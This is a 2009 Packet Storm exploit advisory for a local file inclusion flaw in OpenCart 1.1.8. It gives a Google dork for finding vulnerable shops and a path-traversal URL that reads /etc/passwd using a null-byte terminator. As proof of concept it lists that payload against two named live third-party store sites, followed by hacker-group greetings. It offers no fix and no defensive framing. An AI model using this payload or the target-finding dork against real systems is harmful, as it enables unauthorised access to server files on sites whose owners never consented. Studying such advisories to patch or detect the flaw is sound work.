Opencart 1.1.8 Local File Inclusion

2009-04-25T00:00:00
ID PACKETSTORM:77019
Type packetstorm
Reporter OoN_Boy
Modified 2009-04-25T00:00:00

Description

                                        
                                            `[+]=================================================================[+]  
[x]Title : Opencart Lfi Injection Vulnerability  
[x]Software : OpenCart opencart_v1.1.8  
[x]Vendor : http://www.opencart.com/  
[x]Date : 25 April 2009 ( Indonesia )   
[x]Author : OoN_Boy  
[x]Contact : oon.boy9@gmail.com  
[x]Blog : http://oonboy.blogspot.com  
[+]=================================================================[+]  
[o] Vulnerable file  
  
index.php  
[+]=================================================================[+]  
[x] Google Dork  
  
"Powered by opencart"  
[+]=================================================================[+]  
[x] Exploit  
  
http://[site]/[path]/index.php?route=../../../../../../../../../../../../../../../etc/passwd%00  
[+]=================================================================[x]  
[x]Poc  
  
http://www.perebook.com/index.php?route=../../../../../../../../../../../../../../../etc/passwd%00  
http://store.thespaberry.com/index.php?route=../../../../../../../../../../../../../../../etc/passwd%00  
[+]=================================================================[+]  
[x] Special Greetz  
  
www.BatamHacker.or.id www.MainHack.com - www.ServerIsDown.org -   
Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,  
zxvf, Joe Chawanua, k0rea,xx_user, s3t4n, Angela Chang, IrcMafia,  
str0ke, em|nem, Pandoe, Ronny   
Dan buat semuanya yg ga bisa di sebut satu²  
[+]=================================================================[+]  
  
  
  
  
  
`